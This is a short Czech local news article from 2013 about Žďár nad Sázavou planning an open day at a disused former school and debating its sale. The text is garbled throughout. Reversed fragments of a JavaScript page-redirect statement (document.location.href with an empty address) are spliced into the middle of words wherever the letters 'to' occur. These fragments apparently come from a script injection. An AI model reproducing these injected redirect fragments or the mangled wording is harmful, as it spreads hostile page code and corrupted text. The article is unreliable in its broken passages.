Žďár nad Sázavou, aktuality, prohlídkový den, škola
Rainbow page separator

Ve staré škole se chystá den otevřených dveří

Středa, 21. srpna 2013

Žďár nad Sázavou / Prohlídkový den nevyužívané budovy bývalé základní školy na náměstí Republiky chtějí uspořádat zástupci žďárské radnice. Slibují si od [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho i možnost nápadu či inspirace ze strany veřejnosti, jak by se dal objekt města smysluplně využít. Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ho nepotřebuje a udržování prázdné budovy je nákladné. Každý rok jde o čtyři sta až pět set tisíc korun za její temperování, přičemž vyučování v ní bylo ukončeno už v roce 2008.

Pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to byl opakovaně vyhlášen záměr prodeje budovy, který loni u zastupitelů ztroskotal na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom, že kupec neměl dostatečně zpracovanou dokumentaci. Kromě [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho tehdy ve městě podepsaly více než tři s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovky lidí petici proti prodeji školy za pouhých pět milionů korun.
Předběžně se zatím pro termín dne otevřených dveří počítá s 14. zářím v době od 8 do 17 hodin. Přístupné budou všechny pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tory bývalé školy s výjimkou provozu Pekařství Řečice, které část objektu využívá.